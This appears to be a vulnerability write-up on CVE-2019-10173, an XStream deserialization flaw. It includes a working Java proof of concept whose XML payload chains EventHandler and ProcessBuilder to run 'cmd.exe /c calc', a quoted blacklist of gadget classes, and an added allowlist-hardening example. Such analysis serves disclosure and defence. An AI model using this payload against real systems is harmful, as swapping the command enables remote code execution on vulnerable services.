001-CVE-2019-10173 Xstream 远程代码执行漏洞.md (2.92 KB / 2021-07-17 00:01:30)
# CVE-2019-10173 XStream remote code execution vulnerability

### 1. Vulnerability summary

XStream 1.4.10 contains a deserialization vulnerability: a bypass of the patch for CVE-2013-7285.

### 2. Affected versions

XStream <= 1.4.6

XStream = 1.4.10

### 3. Reproduction

**PoC**
    
    
```java
package com.bigo;

import com.thoughtworks.xstream.XStream;

import java.beans.EventHandler;
import java.io.IOException;
import java.util.Set;
import java.util.TreeSet;

/**
 * Created by cfchi on 2019/7/26.
 */
public class Main {
    // Serializes a TreeSet holding an EventHandler proxy to show the XML shape XStream emits.
    public static String expGen(){
        XStream xstream = new XStream();
        Set<Comparable> set = new TreeSet<Comparable>();
        set.add("foo");
        set.add(EventHandler.create(Comparable.class, new ProcessBuilder("calc"), "start"));
        String payload = xstream.toXML(set);
        System.out.println(payload);
        return payload;
    }

    // Deserializes the hand-written document with a default (unsecured) XStream instance.
    public static void main(String[] args) throws IOException {
        expGen();
        XStream xStream = new XStream();
        String payload = "<sorted-set>\n" +
                "    <string>foo</string>\n" +
                "    <dynamic-proxy>\n" +
                "    <interface>java.lang.Comparable</interface>\n" +
                "        <handler class=\"java.beans.EventHandler\">\n" +
                "            <target class=\"java.lang.ProcessBuilder\">\n" +
                "                <command>\n" +
                "                    <string>cmd.exe</string>\n" +
                "                    <string>/c</string>\n" +
                "                    <string>calc</string>\n" +
                "                </command>\n" +
                "            </target>\n" +
                "     <action>start</action>"+
                "        </handler>\n" +
                "    </dynamic-proxy>\n" +
                "</sorted-set>\n";
        xStream.fromXML(payload);
    }
}
```
    
Version 1.4.7: whitelist

![](images/15896427860075.png)

Version 1.4.10: the blacklist is not enabled

![](images/15896427938397.png)

Version 1.4.10: the blacklist is not enabled

![](images/15896428355583.png)

Version 1.4.11: the blacklist is enabled

The blacklist:
    
    
```java
private class InternalBlackList implements Converter {
    private InternalBlackList() {
    }

    // The gadget-type check only applies while the caller has not set up the security
    // framework (securityInitialized is false); once permissions are configured, the
    // allowlist decides instead.
    public boolean canConvert(Class type) {
        return type == Void.TYPE
            || type == Void.class
            || !XStream.this.securityInitialized
                && type != null
                && (type.getName().equals("java.beans.EventHandler")
                    || type.getName().endsWith("$LazyIterator")
                    || type.getName().startsWith("javax.crypto."));
    }

    public void marshal(Object source, HierarchicalStreamWriter writer, MarshallingContext context) {
        throw new ConversionException("Security alert. Marshalling rejected.");
    }

    public Object unmarshal(HierarchicalStreamReader reader, UnmarshallingContext context) {
        throw new ConversionException("Security alert. Unmarshalling rejected.");
    }
}
```
    
    ![](images/15896428607039.png)
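Added example, not code from the original post or from the XStream project: the mitigation side of the above, an XStream instance configured deny-by-default through the 1.4.7+ security framework with an explicit allowlist, so that a document naming `java.beans.EventHandler` (or any other class outside the list) is rejected with `ForbiddenClassException` regardless of whether the internal blacklist of the running version is active. The class name `HardenedXStream`, the allowlist contents and both XML documents are constructed for this example.

```java
import com.thoughtworks.xstream.XStream;
import com.thoughtworks.xstream.security.ForbiddenClassException;
import com.thoughtworks.xstream.security.NoTypePermission;
import com.thoughtworks.xstream.security.NullPermission;
import com.thoughtworks.xstream.security.PrimitiveTypePermission;

import java.util.SortedSet;
import java.util.TreeSet;

// Hypothetical class name; not part of XStream or of the original post.
public class HardenedXStream {

    // Deny-by-default: drop the implicit permissions, then allow only the types this
    // application actually exchanges (assumed here: sorted sets of strings).
    public static XStream build() {
        XStream xstream = new XStream();
        xstream.addPermission(NoTypePermission.NONE);              // reject every class ...
        xstream.addPermission(NullPermission.NULL);                // ... except null,
        xstream.addPermission(PrimitiveTypePermission.PRIMITIVES); // primitives,
        xstream.allowTypes(new Class[] { String.class, SortedSet.class, TreeSet.class }); // and these
        return xstream;
    }

    // Returns the parsed object, or null when XStream refused a class name in the input.
    public static Object parse(XStream xstream, String xml) {
        try {
            return xstream.fromXML(xml);
        } catch (ForbiddenClassException e) {
            // The permission check runs in the mapper when the class name is resolved,
            // before any converter (including the dynamic-proxy path) executes.
            System.out.println("rejected: " + e.getMessage());
            return null;
        }
    }

    public static void main(String[] args) {
        XStream xstream = build();
        // Constructed sample containing only allowlisted types: parses normally.
        String benign = "<sorted-set>\n  <string>foo</string>\n</sorted-set>";
        System.out.println("parsed: " + parse(xstream, benign));
        // Constructed sample with the element shape the PoC relies on; the handler class
        // is outside the allowlist, so the document is rejected.
        String untrusted = "<sorted-set>\n  <dynamic-proxy>\n"
                + "    <interface>java.lang.Comparable</interface>\n"
                + "    <handler class=\"java.beans.EventHandler\"/>\n"
                + "  </dynamic-proxy>\n</sorted-set>";
        System.out.println("parsed: " + parse(xstream, untrusted));
    }
}
```

From XStream 1.4.18 on the framework starts in this deny-by-default mode on its own; on the 1.4.7 to 1.4.17 line discussed here the permissions must be added explicitly as above.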
    
    
References
    
    http://www.polaris-lab.com/index.php/archives/658/
    